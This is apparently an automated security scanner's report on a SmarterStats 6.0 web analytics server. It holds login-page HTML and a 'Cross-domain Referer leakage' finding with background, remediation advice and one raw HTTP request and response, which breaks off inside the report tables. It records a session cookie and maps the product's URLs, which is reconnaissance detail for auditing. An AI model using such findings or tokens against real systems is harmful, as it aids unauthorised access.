       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       <div class="TipTextFailure">Site ID, username or password is incorrect.</div>
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" value="admin" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" value="admin" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;U&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dU\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:1px;width:1px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


5. Cross-domain Referer leakage
There are 6 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

POST /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}
Content-Length: 6928

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24MPH%24btnShowReport&__EVENTTARGET=ctl00%24MPH%24btnShowReport&__EVENTARGUMENT=&__VIEWSTATE=%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%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%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%2BAxcNc0IHwgGAEDK%2BKPo4AcfCQYAAGjBKVyhCR8KaB8LaB8MBQxTbWFydGVyVG9vbHMfDQUSRGF0ZVBpY2tlck92ZXJyaWRlHw4CAmQWBmYPFCsACA8WEh8LaB8MBQxTbWFydGVyVG9vbHMfCQYAAGjBKVyhCR8PBRUxMC85LzIwMTAgMTI6MDA6MDAgQU0fBgUTMjAxMC0xMC0wOS0wMC0wMC0wMB8QBQdyaUxhYmVsHxFoHwpoHwgGAEDK%2BKPo4AdkFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQfEwUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYfFAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh8VBTpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1JhZEVuZERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhoFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK%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%3D&ctl00%24MPH%24RadStartDate=2010-10-03&ctl00_MPH_RadStartDate_dateInput_text=10%2F3%2F2010&ctl00%24MPH%24RadStartDate%24dateInput=2010-10-03-00-00-00&ctl00_MPH_RadStartDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadStartDate_calendar_SD=%5B%5D&ctl00_MPH_RadStartDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadStartDate_
ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24RadEndDate=2010-10-09&ctl00_MPH_RadEndDate_dateInput_text=10%2F9%2F2010&ctl00%24MPH%24RadEndDate%24dateInput=2010-10-09-00-00-00&ctl00_MPH_RadEndDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadEndDate_calendar_SD=%5B%5D&ctl00_MPH_RadEndDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadEndDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24hfDMFilename=&ctl00%24MPH%24hfDMReport=&ctl00_MPH_mnuTable_rowCount_10_CB=on&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:27 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 45388

1|#||4|625|updatePanel|ctl00_BPH_UpdatePanel2|
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       |11|updatePanel|ctl00_UpdatePanel1|
               
           |312|updatePanel|ctl00_MPH_UpdatePanel1|
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               |38138|updatePanel|ctl00_MPH_UP1|
           <div class="Report"><div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Top Pages</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Top_Pages"> <div class='ReportChart'><img src="/Temp/3022c349e42e4a16915d331a96969eb5.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='ac mine'>&nbsp;</th><th class='al '>Page</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fapptesting.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>apptesting.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
24,906</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
14</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
1,494</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol '>
<div class='percent percent8'></div>
7,968</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
676</td>
<td class='ar percentcol rc'>
<div class='percent percent7'></div>
431</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fdefault.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>default.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent7'></div>
6,980</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
33</td>
<td class='ar percentcol rc'>
<div class='percent percent6'></div>
361</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcloudscandetails.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>cloudscandetails.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent7'></div>
6,732</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
16</td>
<td class='ar percentcol rc'>
<div class='percent percent8'></div>
502</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsales.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sales.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,573</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
16</td>
<td class='ar percentcol rc'>
<div class='percent percent6'></div>
354</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2flearning.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>learning.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,573</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
17</td>
<td class='ar percentcol rc'>
<div class='percent percent4'></div>
270</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsitemap.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sitemap.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,332</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
16</td>
<td class='ar percentcol rc'>
<div class='percent percent3'></div>
192</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fria.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>ria.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
4,091</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
161</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2ftest.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>test.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent3'></div>
3,121</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
153</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2freport.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>report.aspx</a></td>

<td class='ar percentcol '>
<div class='percent percent2'></div>
2,122</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
20</td>
<td class='ar percentcol rc'>
<div class='percent percent11'></div>
665</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=3>Other Items (13)</td>
<td class='FooterTotal ar percentcol'>707</td>
<td class='FooterTotal ar percentcol'>&nbsp;</td>
<td class='FooterTotal ar rc percentcolrc'>10</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=3>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>&nbsp;</td>
<td class='FooterTotal ar rc percentcolrc'>4,594</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=3>Average(s)</td>
<td class='FooterAverages ar percentcol'>3,048</td>
<td class='FooterAverages ar percentcol'>&nbsp;</td>
<td class='FooterAverages ar rc percentcolrc'>200</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Referring Sites</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="ReferringSites"> <div class='ReportChart'><img src="/Temp/b2972344c54b45e38070638051bc9478.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Host</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'>No Referrer <i>(bookmark or direct-entry)</i></a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
681</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '><a href="http://www.sitetalk-world.info" target="_blank" class='ReportLink'>www.sitetalk-world.info</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '><a href="http://www.vilnerable.smarterstats.6.0.host" target="_blank" class='ReportLink'>www.vilnerable.smarterstats.6.0.host</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '><a href="http://yandex.ru" target="_blank" class='ReportLink'>yandex.ru</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '><a href="http://seo.vilnerable.smarterstats.6.0.host" target="_blank" class='ReportLink'>seo.vilnerable.smarterstats.6.0.host</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '><a href="http://www.sitetalk-friends.com" target="_blank" class='ReportLink'>www.sitetalk-friends.com</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '><a href="http://www.way-to-success.com" target="_blank" class='ReportLink'>www.way-to-success.com</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '><a href="http://www2.fastdial.net" target="_blank" class='ReportLink'>www2.fastdial.net</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '><a href="http://www.google.ru" target="_blank" class='ReportLink'>www.google.ru</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '><a href="http://support.mozilla.com" target="_blank" class='ReportLink'>support.mozilla.com</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (8)</td>
<td class='FooterTotal ar rc percentcolrc'>8</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>703</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>39</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Entry Pages</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Path_EntryPages"> <div class='ReportChart'><img src="/Temp/3568cde247644a1b9ec6e79fbea220fc.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='ac mine'>&nbsp;</th><th class='al '>Page</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
668</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fdefault.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>default.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
21</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2ftest.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>test.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsales.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sales.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2freport.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>report.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fimages%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>images<wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcloudscandetails.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>cloudscandetails.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcrossdomain.xml','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>crossdomain.xml</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fria.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>ria.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2flearning.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>learning.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=3>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>703</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=3>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>70</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Paths</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Path_Paths"> <div class='ReportChart'><img src="/Temp/1f19d55ce9bf405b93deb28b84494a1f.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Path</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>/</td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
671</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>/sales.aspx<BR>/cloudscandetails.aspx<BR>/apptesting.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sitemap.aspx<BR>/<BR>/learning.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>/<BR>/report.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>/<BR>/apptesting.aspx<BR>/cloudscandetails.aspx<BR>/learning.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/sitemap.aspx<BR>/cloudscan-netsparker-report.htm<BR>/cloudscanfaqs.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>/images/<BR>/</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
